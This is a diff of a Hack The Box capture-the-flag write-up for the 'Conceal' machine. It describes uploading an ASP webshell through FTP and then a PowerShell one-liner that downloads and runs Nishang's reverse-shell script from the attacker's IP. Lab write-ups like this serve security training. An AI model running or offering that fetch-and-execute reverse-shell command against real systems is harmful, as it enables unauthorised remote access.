Kyuu-Ji/htb-write-up/conceal/write-up-conceal.md

 If we browse to the web page we see the IIS default page and after some enumerating paths we find **/uploads** where it shows the files we uploaded to FTP.
 As **ASPX** does not work but **ASP** does we can upload an .asp file to get a webshell and have command execution.

 We want to execute a reverse shell.
-I will take the on from _Nishang_ and it will listen on my IP and port 9001 and execute revshell.ps1:
+I will take _Invoke-PowerShellTcp.ps1 from Nishang_ that I just call _revshell.ps1_ and it will listen on my IP and port 9001:
 ```markdown
 powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/revshell.ps1')"
 ```

-We now started a reverse shell session with the user _Destitute_ can read the first flag.
+We now started a reverse shell session with the user _Destitute_ and can read the first flag.

 ## Privilege Escalation